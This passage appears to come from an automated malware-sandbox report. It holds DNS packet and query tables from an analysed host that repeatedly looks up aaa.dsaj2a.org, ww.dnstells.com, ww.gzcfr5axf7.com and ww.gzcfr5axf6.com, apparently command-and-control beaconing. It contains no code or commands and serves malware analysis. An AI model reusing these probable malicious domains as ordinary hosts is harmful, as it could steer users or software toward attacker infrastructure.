                                                                  Aug 20, 2024 15:34:09.044358969 CEST5203053192.168.2.238.8.8.8
                                                                  Aug 20, 2024 15:34:09.051935911 CEST53520308.8.8.8192.168.2.23
                                                                  Aug 20, 2024 15:34:14.056471109 CEST4454153192.168.2.238.8.8.8
                                                                  Aug 20, 2024 15:34:14.066730976 CEST53445418.8.8.8192.168.2.23
                                                                  Aug 20, 2024 15:34:14.066889048 CEST4568353192.168.2.238.8.4.4
                                                                  Aug 20, 2024 15:34:14.077651978 CEST53456838.8.4.4192.168.2.23
                                                                  Aug 20, 2024 15:34:14.077756882 CEST5194153192.168.2.238.8.8.8
                                                                  Aug 20, 2024 15:34:14.111656904 CEST53519418.8.8.8192.168.2.23
                                                                  Aug 20, 2024 15:34:14.111737967 CEST5106053192.168.2.238.8.4.4
                                                                  Aug 20, 2024 15:34:14.133721113 CEST53510608.8.4.4192.168.2.23
                                                                  Aug 20, 2024 15:34:14.133826017 CEST3705553192.168.2.238.8.8.8
                                                                  Aug 20, 2024 15:34:14.140583992 CEST53370558.8.8.8192.168.2.23
                                                                  Aug 20, 2024 15:34:19.143562078 CEST6010153192.168.2.238.8.8.8
                                                                  Aug 20, 2024 15:34:19.154084921 CEST53601018.8.8.8192.168.2.23
                                                                  Aug 20, 2024 15:34:19.154174089 CEST3416153192.168.2.238.8.4.4
                                                                  Aug 20, 2024 15:34:19.164902925 CEST53341618.8.4.4192.168.2.23
                                                                  Aug 20, 2024 15:34:19.164999962 CEST3455453192.168.2.238.8.8.8
                                                                  Aug 20, 2024 15:34:19.177695036 CEST53345548.8.8.8192.168.2.23
                                                                  Aug 20, 2024 15:34:19.177761078 CEST5524753192.168.2.238.8.4.4
                                                                  Aug 20, 2024 15:34:19.194538116 CEST53552478.8.4.4192.168.2.23
                                                                  Aug 20, 2024 15:34:19.194645882 CEST4999653192.168.2.238.8.8.8
                                                                  Aug 20, 2024 15:34:19.218457937 CEST53499968.8.8.8192.168.2.23
                                                                  Aug 20, 2024 15:34:24.222907066 CEST5759053192.168.2.238.8.8.8
                                                                  Aug 20, 2024 15:34:24.233237028 CEST53575908.8.8.8192.168.2.23
                                                                  Aug 20, 2024 15:34:24.233330965 CEST4613953192.168.2.238.8.4.4
                                                                  Aug 20, 2024 15:34:24.243072033 CEST53461398.8.4.4192.168.2.23
                                                                  Aug 20, 2024 15:34:24.243160009 CEST4461453192.168.2.238.8.8.8
                                                                  Aug 20, 2024 15:34:24.254429102 CEST53446148.8.8.8192.168.2.23
                                                                  Aug 20, 2024 15:34:24.254492044 CEST3954253192.168.2.238.8.4.4
                                                                  Aug 20, 2024 15:34:24.267159939 CEST53395428.8.4.4192.168.2.23
                                                                  Aug 20, 2024 15:34:24.267229080 CEST4688153192.168.2.238.8.8.8
                                                                  Aug 20, 2024 15:34:24.274929047 CEST53468818.8.8.8192.168.2.23
                                                                  Aug 20, 2024 15:34:29.278918982 CEST3631853192.168.2.238.8.8.8
                                                                  Aug 20, 2024 15:34:29.291583061 CEST53363188.8.8.8192.168.2.23
                                                                  Aug 20, 2024 15:34:29.291681051 CEST3596153192.168.2.238.8.4.4
                                                                  Aug 20, 2024 15:34:29.314192057 CEST53359618.8.4.4192.168.2.23
                                                                  Aug 20, 2024 15:34:29.314313889 CEST5495153192.168.2.238.8.8.8
                                                                  Aug 20, 2024 15:34:29.323683023 CEST53549518.8.8.8192.168.2.23
                                                                  Aug 20, 2024 15:34:29.323755980 CEST5619053192.168.2.238.8.4.4
                                                                  Aug 20, 2024 15:34:29.339569092 CEST53561908.8.4.4192.168.2.23
                                                                  Aug 20, 2024 15:34:29.339648008 CEST4761153192.168.2.238.8.8.8
                                                                  Aug 20, 2024 15:34:29.347484112 CEST53476118.8.8.8192.168.2.23
                                                                  Aug 20, 2024 15:34:34.352046013 CEST3441153192.168.2.238.8.8.8
                                                                  Aug 20, 2024 15:34:34.375806093 CEST53344118.8.8.8192.168.2.23
                                                                  Aug 20, 2024 15:34:34.375931978 CEST5753653192.168.2.238.8.4.4
                                                                  Aug 20, 2024 15:34:34.391058922 CEST53575368.8.4.4192.168.2.23
                                                                  Aug 20, 2024 15:34:34.391191006 CEST4404753192.168.2.238.8.8.8
                                                                  Aug 20, 2024 15:34:34.401767969 CEST53440478.8.8.8192.168.2.23
                                                                  Aug 20, 2024 15:34:34.401849031 CEST3422453192.168.2.238.8.4.4
                                                                  Aug 20, 2024 15:34:34.413877010 CEST53342248.8.4.4192.168.2.23
                                                                  Aug 20, 2024 15:34:34.413964033 CEST3760753192.168.2.238.8.8.8
                                                                  Aug 20, 2024 15:34:34.420672894 CEST53376078.8.8.8192.168.2.23
                                                                  Aug 20, 2024 15:34:39.425430059 CEST3374753192.168.2.238.8.8.8
                                                                  Aug 20, 2024 15:34:39.445445061 CEST53337478.8.8.8192.168.2.23
                                                                  Aug 20, 2024 15:34:39.445626020 CEST5665953192.168.2.238.8.4.4
                                                                  Aug 20, 2024 15:34:39.455568075 CEST53566598.8.4.4192.168.2.23
                                                                  Aug 20, 2024 15:34:39.455732107 CEST3551553192.168.2.238.8.8.8
                                                                  Aug 20, 2024 15:34:39.493314028 CEST53355158.8.8.8192.168.2.23
                                                                  Aug 20, 2024 15:34:39.493415117 CEST4952853192.168.2.238.8.4.4
                                                                  Aug 20, 2024 15:34:39.511337042 CEST53495288.8.4.4192.168.2.23
                                                                  Aug 20, 2024 15:34:39.511424065 CEST4991653192.168.2.238.8.8.8
                                                                  Aug 20, 2024 15:34:39.518507957 CEST53499168.8.8.8192.168.2.23
                                                                  Aug 20, 2024 15:34:44.522949934 CEST5489453192.168.2.238.8.8.8
                                                                  Aug 20, 2024 15:34:44.555475950 CEST53548948.8.8.8192.168.2.23
                                                                  Aug 20, 2024 15:34:44.556514978 CEST4881153192.168.2.238.8.4.4
                                                                  Aug 20, 2024 15:34:44.569109917 CEST53488118.8.4.4192.168.2.23
                                                                  Aug 20, 2024 15:34:44.572573900 CEST3927353192.168.2.238.8.8.8
                                                                  Aug 20, 2024 15:34:44.582562923 CEST53392738.8.8.8192.168.2.23
                                                                  Aug 20, 2024 15:34:44.582643032 CEST3975453192.168.2.238.8.4.4
                                                                  Aug 20, 2024 15:34:44.593102932 CEST53397548.8.4.4192.168.2.23
                                                                  Aug 20, 2024 15:34:44.600517035 CEST4005653192.168.2.238.8.8.8
                                                                  Aug 20, 2024 15:34:44.609062910 CEST53400568.8.8.8192.168.2.23
                                                                  Aug 20, 2024 15:34:49.611341953 CEST5742353192.168.2.238.8.8.8
                                                                  Aug 20, 2024 15:34:49.625333071 CEST53574238.8.8.8192.168.2.23
                                                                  Aug 20, 2024 15:34:49.625459909 CEST5319253192.168.2.238.8.4.4
                                                                  Aug 20, 2024 15:34:49.635902882 CEST53531928.8.4.4192.168.2.23
                                                                  Aug 20, 2024 15:34:49.636002064 CEST5935153192.168.2.238.8.8.8
                                                                  Aug 20, 2024 15:34:49.659149885 CEST53593518.8.8.8192.168.2.23
                                                                  Aug 20, 2024 15:34:49.659280062 CEST3305753192.168.2.238.8.4.4
                                                                  Aug 20, 2024 15:34:49.670355082 CEST53330578.8.4.4192.168.2.23
                                                                  Aug 20, 2024 15:34:49.670447111 CEST4679353192.168.2.238.8.8.8
                                                                  Aug 20, 2024 15:34:49.679826975 CEST53467938.8.8.8192.168.2.23
                                                                  Aug 20, 2024 15:34:54.684293985 CEST5959653192.168.2.238.8.8.8
                                                                  Aug 20, 2024 15:34:54.701713085 CEST53595968.8.8.8192.168.2.23
                                                                  Aug 20, 2024 15:34:54.702004910 CEST3769153192.168.2.238.8.4.4
                                                                  Aug 20, 2024 15:34:54.711842060 CEST53376918.8.4.4192.168.2.23
                                                                  Aug 20, 2024 15:34:54.712033987 CEST5540653192.168.2.238.8.8.8
                                                                  Aug 20, 2024 15:34:54.722115993 CEST53554068.8.8.8192.168.2.23
                                                                  Aug 20, 2024 15:34:54.722198009 CEST3909653192.168.2.238.8.4.4
                                                                  Aug 20, 2024 15:34:54.732453108 CEST53390968.8.4.4192.168.2.23
                                                                  Aug 20, 2024 15:34:54.732559919 CEST4757253192.168.2.238.8.8.8
                                                                  Aug 20, 2024 15:34:54.739579916 CEST53475728.8.8.8192.168.2.23
                                                                  Aug 20, 2024 15:34:59.744098902 CEST5191153192.168.2.238.8.8.8
                                                                  Aug 20, 2024 15:34:59.760524035 CEST53519118.8.8.8192.168.2.23
                                                                  Aug 20, 2024 15:34:59.760611057 CEST5355353192.168.2.238.8.4.4
                                                                  Aug 20, 2024 15:34:59.771076918 CEST53535538.8.4.4192.168.2.23
                                                                  Aug 20, 2024 15:34:59.771183014 CEST5601453192.168.2.238.8.8.8
                                                                  Aug 20, 2024 15:34:59.795047998 CEST53560148.8.8.8192.168.2.23
                                                                  Aug 20, 2024 15:34:59.795114040 CEST3543153192.168.2.238.8.4.4
                                                                  Aug 20, 2024 15:34:59.813102961 CEST53354318.8.4.4192.168.2.23
                                                                  Aug 20, 2024 15:34:59.813193083 CEST3566453192.168.2.238.8.8.8
                                                                  Aug 20, 2024 15:34:59.819709063 CEST53356648.8.8.8192.168.2.23
                                                                  Aug 20, 2024 15:35:04.824400902 CEST5492853192.168.2.238.8.8.8
                                                                  Aug 20, 2024 15:35:04.840450048 CEST53549288.8.8.8192.168.2.23
                                                                  Aug 20, 2024 15:35:04.840712070 CEST3294753192.168.2.238.8.4.4
                                                                  Aug 20, 2024 15:35:04.850723982 CEST53329478.8.4.4192.168.2.23
                                                                  Aug 20, 2024 15:35:04.850817919 CEST6017853192.168.2.238.8.8.8
                                                                  Aug 20, 2024 15:35:04.865865946 CEST53601788.8.8.8192.168.2.23
                                                                  Aug 20, 2024 15:35:04.865923882 CEST3414353192.168.2.238.8.4.4
                                                                  Aug 20, 2024 15:35:04.877391100 CEST53341438.8.4.4192.168.2.23
                                                                  Aug 20, 2024 15:35:04.877650976 CEST3928653192.168.2.238.8.8.8
                                                                  Aug 20, 2024 15:35:04.885186911 CEST53392868.8.8.8192.168.2.23
                                                                  Aug 20, 2024 15:35:09.889811039 CEST5004153192.168.2.238.8.8.8
                                                                  Aug 20, 2024 15:35:10.913506031 CEST53500418.8.8.8192.168.2.23
                                                                  Aug 20, 2024 15:35:10.913961887 CEST5290853192.168.2.238.8.4.4
                                                                  Aug 20, 2024 15:35:10.926918030 CEST53529088.8.4.4192.168.2.23
                                                                  Aug 20, 2024 15:35:10.927124023 CEST4692753192.168.2.238.8.8.8
                                                                  Aug 20, 2024 15:35:10.937247992 CEST53469278.8.8.8192.168.2.23
                                                                  Aug 20, 2024 15:35:10.937413931 CEST4139653192.168.2.238.8.4.4
                                                                  Aug 20, 2024 15:35:10.947144985 CEST53413968.8.4.4192.168.2.23
                                                                  Aug 20, 2024 15:35:10.947216034 CEST5398053192.168.2.238.8.8.8
                                                                  Aug 20, 2024 15:35:10.954763889 CEST53539808.8.8.8192.168.2.23
                                                                  Aug 20, 2024 15:35:15.959306955 CEST4865853192.168.2.238.8.8.8
                                                                  Aug 20, 2024 15:35:15.969352961 CEST53486588.8.8.8192.168.2.23
                                                                  Aug 20, 2024 15:35:15.969558001 CEST5745053192.168.2.238.8.4.4
                                                                  Aug 20, 2024 15:35:15.978885889 CEST53574508.8.4.4192.168.2.23
                                                                  Aug 20, 2024 15:35:15.979016066 CEST3967753192.168.2.238.8.8.8
                                                                  Aug 20, 2024 15:35:15.989343882 CEST53396778.8.8.8192.168.2.23
                                                                  Aug 20, 2024 15:35:15.989461899 CEST5042653192.168.2.238.8.4.4
                                                                  Aug 20, 2024 15:35:16.000397921 CEST53504268.8.4.4192.168.2.23
                                                                  Aug 20, 2024 15:35:16.000513077 CEST4625353192.168.2.238.8.8.8
                                                                  Aug 20, 2024 15:35:16.008491993 CEST53462538.8.8.8192.168.2.23
                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                  Aug 20, 2024 15:33:13.210793972 CEST192.168.2.238.8.8.80xca08Standard query (0)aaa.dsaj2a.orgA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:33:13.217689037 CEST192.168.2.238.8.8.80xa94cStandard query (0)ww.dnstells.comA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:33:13.228327036 CEST192.168.2.238.8.4.40x8b88Standard query (0)ww.dnstells.comA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:33:13.238342047 CEST192.168.2.238.8.8.80x3a25Standard query (0)ww.gzcfr5axf7.comA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:33:13.248356104 CEST192.168.2.238.8.4.40x1f40Standard query (0)ww.gzcfr5axf7.comA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:33:13.258529902 CEST192.168.2.238.8.8.80x964eStandard query (0)ww.gzcfr5axf6.comA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:33:18.269777060 CEST192.168.2.238.8.8.80xd316Standard query (0)ww.dnstells.comA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:33:18.282352924 CEST192.168.2.238.8.4.40x787fStandard query (0)ww.dnstells.comA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:33:18.295258999 CEST192.168.2.238.8.8.80x4b24Standard query (0)ww.gzcfr5axf7.comA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:33:18.322813988 CEST192.168.2.238.8.4.40x15a6Standard query (0)ww.gzcfr5axf7.comA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:33:18.339294910 CEST192.168.2.238.8.8.80x5093Standard query (0)ww.gzcfr5axf6.comA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:33:23.359076977 CEST192.168.2.238.8.8.80x39feStandard query (0)ww.dnstells.comA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:33:23.369920969 CEST192.168.2.238.8.4.40xdaebStandard query (0)ww.dnstells.comA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:33:23.380501032 CEST192.168.2.238.8.8.80x87cbStandard query (0)ww.gzcfr5axf7.comA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:33:23.398422003 CEST192.168.2.238.8.4.40xc293Standard query (0)ww.gzcfr5axf7.comA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:33:23.409346104 CEST192.168.2.238.8.8.80x541dStandard query (0)ww.gzcfr5axf6.comA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:33:28.418709040 CEST192.168.2.238.8.8.80x5da7Standard query (0)ww.dnstells.comA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:33:28.436306000 CEST192.168.2.238.8.4.40xb232Standard query (0)ww.dnstells.comA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:33:28.457220078 CEST192.168.2.238.8.8.80x6777Standard query (0)ww.gzcfr5axf7.comA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:33:28.469017982 CEST192.168.2.238.8.4.40x8c4bStandard query (0)ww.gzcfr5axf7.comA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:33:28.479439020 CEST192.168.2.238.8.8.80xf4ffStandard query (0)ww.gzcfr5axf6.comA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:33:33.499046087 CEST192.168.2.238.8.8.80x2ccbStandard query (0)ww.dnstells.comA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:33:33.527776003 CEST192.168.2.238.8.4.40x4a07Standard query (0)ww.dnstells.comA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:33:33.539158106 CEST192.168.2.238.8.8.80xae84Standard query (0)ww.gzcfr5axf7.comA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:33:33.555253983 CEST192.168.2.238.8.4.40x51e8Standard query (0)ww.gzcfr5axf7.comA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:33:33.565215111 CEST192.168.2.238.8.8.80x18b0Standard query (0)ww.gzcfr5axf6.comA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:33:38.576958895 CEST192.168.2.238.8.8.80x4328Standard query (0)ww.dnstells.comA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:33:38.587291956 CEST192.168.2.238.8.4.40x13daStandard query (0)ww.dnstells.comA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:33:38.603701115 CEST192.168.2.238.8.8.80xeaf3Standard query (0)ww.gzcfr5axf7.comA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:33:38.625533104 CEST192.168.2.238.8.4.40xe116Standard query (0)ww.gzcfr5axf7.comA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:33:38.636653900 CEST192.168.2.238.8.8.80xb982Standard query (0)ww.gzcfr5axf6.comA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:33:43.660666943 CEST192.168.2.238.8.8.80xe27cStandard query (0)ww.dnstells.comA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:33:43.670932055 CEST192.168.2.238.8.4.40x343cStandard query (0)ww.dnstells.comA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:33:43.686122894 CEST192.168.2.238.8.8.80xa012Standard query (0)ww.gzcfr5axf7.comA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:33:43.695976019 CEST192.168.2.238.8.4.40xb55aStandard query (0)ww.gzcfr5axf7.comA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:33:43.710443974 CEST192.168.2.238.8.8.80x9476Standard query (0)ww.gzcfr5axf6.comA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:33:48.724364996 CEST192.168.2.238.8.8.80x2208Standard query (0)ww.dnstells.comA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:33:48.736531973 CEST192.168.2.238.8.4.40x7c67Standard query (0)ww.dnstells.comA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:33:48.747051954 CEST192.168.2.238.8.8.80x3b04Standard query (0)ww.gzcfr5axf7.comA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:33:48.758111000 CEST192.168.2.238.8.4.40xa6e6Standard query (0)ww.gzcfr5axf7.comA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:33:48.767684937 CEST192.168.2.238.8.8.80xe776Standard query (0)ww.gzcfr5axf6.comA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:33:53.790005922 CEST192.168.2.238.8.8.80xcbd7Standard query (0)ww.dnstells.comA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:33:53.823414087 CEST192.168.2.238.8.4.40xf523Standard query (0)ww.dnstells.comA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:33:53.834913015 CEST192.168.2.238.8.8.80xbf3Standard query (0)ww.gzcfr5axf7.comA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:33:53.844167948 CEST192.168.2.238.8.4.40x72cdStandard query (0)ww.gzcfr5axf7.comA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:33:53.860977888 CEST192.168.2.238.8.8.80xb17fStandard query (0)ww.gzcfr5axf6.comA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:33:58.873265028 CEST192.168.2.238.8.8.80x4072Standard query (0)ww.dnstells.comA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:33:58.883826017 CEST192.168.2.238.8.4.40xb849Standard query (0)ww.dnstells.comA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:33:58.894243956 CEST192.168.2.238.8.8.80xfc2fStandard query (0)ww.gzcfr5axf7.comA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:33:58.903924942 CEST192.168.2.238.8.4.40xd75aStandard query (0)ww.gzcfr5axf7.comA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:33:58.919729948 CEST192.168.2.238.8.8.80xc570Standard query (0)ww.gzcfr5axf6.comA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:34:03.933043957 CEST192.168.2.238.8.8.80x13ffStandard query (0)ww.dnstells.comA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:34:03.945491076 CEST192.168.2.238.8.4.40x4994Standard query (0)ww.dnstells.comA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:34:03.956357002 CEST192.168.2.238.8.8.80x176fStandard query (0)ww.gzcfr5axf7.comA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:34:03.969943047 CEST192.168.2.238.8.4.40xc4b1Standard query (0)ww.gzcfr5axf7.comA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:34:03.979664087 CEST192.168.2.238.8.8.80x5419Standard query (0)ww.gzcfr5axf6.comA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:34:08.989025116 CEST192.168.2.238.8.8.80x5d47Standard query (0)ww.dnstells.comA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:34:09.000530958 CEST192.168.2.238.8.4.40x8012Standard query (0)ww.dnstells.comA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:34:09.018616915 CEST192.168.2.238.8.8.80x4166Standard query (0)ww.gzcfr5axf7.comA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:34:09.033441067 CEST192.168.2.238.8.4.40xda42Standard query (0)ww.gzcfr5axf7.comA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:34:09.044358969 CEST192.168.2.238.8.8.80x5f3Standard query (0)ww.gzcfr5axf6.comA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:34:14.056471109 CEST192.168.2.238.8.8.80xf2dfStandard query (0)ww.dnstells.comA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:34:14.066889048 CEST192.168.2.238.8.4.40xa12fStandard query (0)ww.dnstells.comA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:34:14.077756882 CEST192.168.2.238.8.8.80xa857Standard query (0)ww.gzcfr5axf7.comA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:34:14.111737967 CEST192.168.2.238.8.4.40xa061Standard query (0)ww.gzcfr5axf7.comA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:34:14.133826017 CEST192.168.2.238.8.8.80x5ae7Standard query (0)ww.gzcfr5axf6.comA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:34:19.143562078 CEST192.168.2.238.8.8.80x61adStandard query (0)ww.dnstells.comA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:34:19.154174089 CEST192.168.2.238.8.4.40xfefbStandard query (0)ww.dnstells.comA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:34:19.164999962 CEST192.168.2.238.8.8.80xc0aStandard query (0)ww.gzcfr5axf7.comA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:34:19.177761078 CEST192.168.2.238.8.4.40x28abStandard query (0)ww.gzcfr5axf7.comA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:34:19.194645882 CEST192.168.2.238.8.8.80x6d51Standard query (0)ww.gzcfr5axf6.comA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:34:24.222907066 CEST192.168.2.238.8.8.80xae18Standard query (0)ww.dnstells.comA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:34:24.233330965 CEST192.168.2.238.8.4.40x5df2Standard query (0)ww.dnstells.comA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:34:24.243160009 CEST192.168.2.238.8.8.80x1205Standard query (0)ww.gzcfr5axf7.comA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:34:24.254492044 CEST192.168.2.238.8.4.40x8e44Standard query (0)ww.gzcfr5axf7.comA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:34:24.267229080 CEST192.168.2.238.8.8.80x8c52Standard query (0)ww.gzcfr5axf6.comA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:34:29.278918982 CEST192.168.2.238.8.8.80x334eStandard query (0)ww.dnstells.comA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:34:29.291681051 CEST192.168.2.238.8.4.40x196aStandard query (0)ww.dnstells.comA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:34:29.314313889 CEST192.168.2.238.8.8.80x1bc0Standard query (0)ww.gzcfr5axf7.comA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:34:29.323755980 CEST192.168.2.238.8.4.40x7b7dStandard query (0)ww.gzcfr5axf7.comA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:34:29.339648008 CEST192.168.2.238.8.8.80x2510Standard query (0)ww.gzcfr5axf6.comA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:34:34.352046013 CEST192.168.2.238.8.8.80xfd36Standard query (0)ww.dnstells.comA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:34:34.375931978 CEST192.168.2.238.8.4.40xd216Standard query (0)ww.dnstells.comA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:34:34.391191006 CEST192.168.2.238.8.8.80x1485Standard query (0)ww.gzcfr5axf7.comA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:34:34.401849031 CEST192.168.2.238.8.4.40x7244Standard query (0)ww.gzcfr5axf7.comA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:34:34.413964033 CEST192.168.2.238.8.8.80x5f9bStandard query (0)ww.gzcfr5axf6.comA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:34:39.425430059 CEST192.168.2.238.8.8.80xf563Standard query (0)ww.dnstells.comA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:34:39.445626020 CEST192.168.2.238.8.4.40x8573Standard query (0)ww.dnstells.comA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:34:39.455732107 CEST192.168.2.238.8.8.80xbdf2Standard query (0)ww.gzcfr5axf7.comA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:34:39.493415117 CEST192.168.2.238.8.4.40x6565Standard query (0)ww.gzcfr5axf7.comA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:34:39.511424065 CEST192.168.2.238.8.8.80x3b21Standard query (0)ww.gzcfr5axf6.comA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:34:44.522949934 CEST192.168.2.238.8.8.80xccfcStandard query (0)ww.dnstells.comA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:34:44.556514978 CEST192.168.2.238.8.4.40x35b6Standard query (0)ww.dnstells.comA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:34:44.572573900 CEST192.168.2.238.8.8.80xa23fStandard query (0)ww.gzcfr5axf7.comA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:34:44.582643032 CEST192.168.2.238.8.4.40x4920Standard query (0)ww.gzcfr5axf7.comA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:34:44.600517035 CEST192.168.2.238.8.8.80x7652Standard query (0)ww.gzcfr5axf6.comA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:34:49.611341953 CEST192.168.2.238.8.8.80xf492Standard query (0)ww.dnstells.comA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:34:49.625459909 CEST192.168.2.238.8.4.40xffa9Standard query (0)ww.dnstells.comA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:34:49.636002064 CEST192.168.2.238.8.8.80xea5bStandard query (0)ww.gzcfr5axf7.comA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:34:49.659280062 CEST192.168.2.238.8.4.40x6d5eStandard query (0)ww.gzcfr5axf7.comA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:34:49.670447111 CEST192.168.2.238.8.8.80xfb51Standard query (0)ww.gzcfr5axf6.comA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:34:54.684293985 CEST192.168.2.238.8.8.80x6d2Standard query (0)ww.dnstells.comA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:34:54.702004910 CEST192.168.2.238.8.4.40xc211Standard query (0)ww.dnstells.comA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:34:54.712033987 CEST192.168.2.238.8.8.80x640bStandard query (0)ww.gzcfr5axf7.comA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:34:54.722198009 CEST192.168.2.238.8.4.40xf36fStandard query (0)ww.gzcfr5axf7.comA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:34:54.732559919 CEST192.168.2.238.8.8.80xbd37Standard query (0)ww.gzcfr5axf6.comA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:34:59.744098902 CEST192.168.2.238.8.8.80xbf8aStandard query (0)ww.dnstells.comA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:34:59.760611057 CEST192.168.2.238.8.4.40x661fStandard query (0)ww.dnstells.comA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:34:59.771183014 CEST192.168.2.238.8.8.80x7f5bStandard query (0)ww.gzcfr5axf7.comA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:34:59.795114040 CEST192.168.2.238.8.4.40xb91fStandard query (0)ww.gzcfr5axf7.comA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:34:59.813193083 CEST192.168.2.238.8.8.80xba95Standard query (0)ww.gzcfr5axf6.comA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:35:04.824400902 CEST192.168.2.238.8.8.80xd664Standard query (0)ww.dnstells.comA (IP address)IN (0x0001)false
                                                                  Aug 20, 2024 15:35:04.840712070 CEST192.168.2.238.8.4.40x3d47Standard query (0)ww.dnstells.comA (IP address)IN (0x0001)false
